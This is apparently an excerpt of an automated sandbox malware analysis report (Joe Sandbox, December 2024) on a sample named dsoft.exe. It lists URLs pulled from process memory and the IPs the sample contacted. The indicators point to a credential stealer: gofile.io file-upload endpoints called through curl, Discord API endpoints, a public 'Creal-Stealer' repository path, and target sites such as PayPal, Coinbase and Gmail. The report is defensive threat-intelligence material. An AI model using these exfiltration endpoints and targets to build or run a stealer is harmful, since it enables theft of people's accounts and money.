https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	dsoft.exe, 00000001.00000002.2568617414.0000029489480000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2707717704.000001FA5CAE0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://youtube.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://blog.jaraco.com/skeleton	dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://twitch.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store4.gofile.io/u&	cmd.exe, 00000029.00000002.2373686223.00000213A668B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc3610	dsoft.exe, 00000001.00000003.2545732531.0000029488ADE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2550665354.0000029488ADF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488ADE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895D3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679719201.000001FA5B864000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2686149501.000001FA5B865000.00000004.00000020.00020000.00000000.sdmp	false		high
http://curl.haxx.se/rfc/cookie_spec.html	dsoft.exe, 00000001.00000002.2571047548.000002948A0E0000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015553869.00000294896AA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015553869.0000029489689000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192181460.000001FA5CCDF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode	dsoft.exe, 00000001.00000002.2570716868.0000029489D80000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md	dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	dsoft.exe, 00000001.00000003.2557709314.0000029488DF3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535420058.0000029488DD9000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535331948.0000029488DCC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2570912516.0000029489FA0000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015658048.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2567431865.0000029488DF3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2557121701.0000029488DF3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539030193.0000029488DF3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535501863.0000029488DEA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2716548036.000001FA5D5E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crunchyroll.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gmail.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paypal.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://coinbase.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	dsoft.exe, 00000001.00000003.2536991819.0000029486172000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2562652028.00000294861C4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542181367.00000294861C2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539619903.0000029486184000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679295806.000001FA596B6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileDRI	cmd.exe, 00000011.00000002.2236871646.000001EAF2E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000026.00000002.2372004977.00000252CF160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ebay.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://httpbin.org/	dsoft.exe, 0000000E.00000003.2677190879.000001FA5C189000.00000004.00000020.00020000.00000000.sdmp	false		high
https://roblox.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	dsoft.exe, 00000001.00000003.2009384833.0000029488561000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2008873908.0000029488561000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/u	cmd.exe, 00000007.00000002.2150326748.000002BBEB28B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://hbo.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://binance.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.gg/r	dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://playstation.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	dsoft.exe, 00000001.00000003.2544948231.00000294885F3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2552025454.0000029488604000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535420058.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539322355.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535862130.00000294885ED000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015658048.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539030193.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547611393.0000029488E36000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554880943.0000029488604000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251415686.00000294885F0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2684580893.000001FA5CCAB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sellix.io)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/pypa/setuptools/issues/417#issuecomment-392298401	dsoft.exe, 00000001.00000002.2565697167.0000029488620000.00000004.00001000.00020000.00000000.sdmp	false		high
https://wiki.debian.org/XDGBaseDirectorySpecification#state	dsoft.exe, 00000001.00000003.2536991819.0000029486172000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546618302.00000294861B0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539619903.0000029486184000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677558955.000001FA5BACC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679295806.000001FA596B6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2185649378.000001FA5BB40000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2420767058.000001FA5BAC6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2188458785.000001FA5BB40000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2687166926.000001FA5BB53000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gofile.io/d/qEb3qj)	dsoft.exe, 00000001.00000003.2534735683.000002948994D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2250652495.0000029489708000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534412343.000002948994A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251126528.000002948994A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileTEM32	curl.exe, 00000009.00000002.2149787568.00000167975D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFilecurl	curl.exe, 00000009.00000002.2149787568.00000167975D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2186534267.0000022CEC920000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001C.00000002.2239967178.000001A81E8D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002E.00000002.2374793951.000001BA62A40000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc6125#section-6.4.3	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://discord.com/api/v6/guilds/	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://telegram.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/mail	dsoft.exe, 00000001.00000003.2537324099.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546117734.0000029488C7D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541781590.000002948846D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551136597.00000294884B3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539552656.0000029488462000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539842827.0000029488467000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547514499.000002948848E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2553471547.00000294884BB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2549283681.0000029488493000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2191490919.000001FA5C13E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676516271.000001FA5C17A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2678643539.000001FA5C18D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677190879.000001FA5C189000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/jaraco/jaraco.functools/issues/5	dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2565795035.0000029488720000.00000004.00001000.00020000.00000000.sdmp	false		high
https://pornhub.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	dsoft.exe, 00000001.00000002.2570386727.00000294898CE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251567810.00000294898CC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251521232.00000294898BF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251226589.00000294898BF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539962337.00000294898CD000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534412343.00000294898AC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	dsoft.exe, 00000001.00000003.2009384833.0000029488561000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2008873908.0000029488561000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.rfc-editor.org/info/rfc7253	dsoft.exe, 00000001.00000003.2541343735.0000029489846000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554026491.0000029489853000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542760819.000002948984B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2570023169.0000029489854000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2680203394.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676039834.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aka.ms/vcpython27p	dsoft.exe, 0000000E.00000002.2707717704.000001FA5CAE0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	dsoft.exe, 00000001.00000003.2537777125.0000029488B98000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538414293.0000029488BA1000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2545860552.0000029488BA5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535580170.0000029489668000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555647774.0000029488BA5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488B98000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548181855.0000029488BA5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488B98000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543261606.0000029488BA5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2191490919.000001FA5C13E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/installing/	dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mahler:8092/site-updates.py	dsoft.exe, 00000001.00000003.2537324099.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488D44000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538502923.0000029488D43000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548120060.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546659014.0000029488D4A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2680203394.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676039834.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2696286326.000001FA5CD00000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.gofile.io/getServerr	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://discord.gg/	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gofile.io/d/GyGDwi	dsoft.exe, 0000000E.00000003.2420158932.000001FA5CE15000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000003.2303495752.00000227F8BC8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=referral	dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/library/re.html#re.sub	dsoft.exe, 00000001.00000003.2012706454.0000029488D30000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2565892869.0000029488840000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2012706454.0000029488CF1000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2010117969.0000029488AF3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2010117969.0000029488B32000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2567821197.0000029488F60000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2705743567.000001FA5BE10000.00000004.00001000.00020000.00000000.sdmp	false		high
https://netflix.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2920	dsoft.exe, 00000001.00000002.2570912516.0000029489FA0000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2716548036.000001FA5D5E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gmail.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpgrX	dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg	dsoft.exe, 0000000E.00000003.2420158932.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://outlook.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gofile.io/d/Aq7c2m)	dsoft.exe, 00000001.00000002.2571489962.000002948A460000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534412343.000002948994A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251126528.000002948994A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2	dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://binance.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/pyparsing/pyparsing/wiki	dsoft.exe, 0000000E.00000003.2682720383.000001FA5C2C9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://youtube.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://spotify.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img.shields.io/badge/code%20style-black-000000.svg	dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://spotify.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setuptools.pypa.io/en/stable/history.html	dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gofile.io/d/Aq7c2m	dsoft.exe, 00000001.00000003.2251226589.0000029489899000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185821263.0000022CEC970000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185629331.0000022CEC9A2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185970287.0000022CEC94A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185749532.0000022CEC989000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2186868206.0000022CEC970000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185715170.0000022CEC96F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185749532.0000022CEC9A2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185925847.0000022CEC9A2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185629331.0000022CEC989000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.iana.org/time-zones/repository/tz-link.html	dsoft.exe, 00000001.00000003.2008873908.0000029488559000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2008873908.0000029488561000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.python.org/library/itertools.html#recipes	dsoft.exe, 00000001.00000002.2565892869.0000029488840000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548515712.00000294885B0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2558178753.00000294885D5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541850767.00000294885AE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2545891343.00000294885B0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555421341.00000294885B0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2568096593.0000029489080000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2558384388.00000294885D8000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539453832.0000029488525000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540133201.0000029488535000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2536542831.0000029488519000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539168516.000002948851C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2705743567.000001FA5BE10000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2191490919.000001FA5C1F6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpgrXz	dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gofile.io/d/GyGDwi)	dsoft.exe, 0000000E.00000003.2420158932.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://yahoo.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/users/	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store4.gofile.io/uploadFileomBz	curl.exe, 0000000D.00000002.2186534267.0000022CEC928000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.138.232	discord.com	United States	13335	CLOUDFLARENETUS	false
45.112.123.126	api.gofile.io	Singapore	16509	AMAZON-02US	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
159.89.102.253	geolocation-db.com	United States	14061	DIGITALOCEAN-ASNUS	false
31.14.70.245	store4.gofile.io	Virgin Islands (BRITISH)	199483	LINKER-ASFR	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582061
Start date and time:	2024-12-29 20:01:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
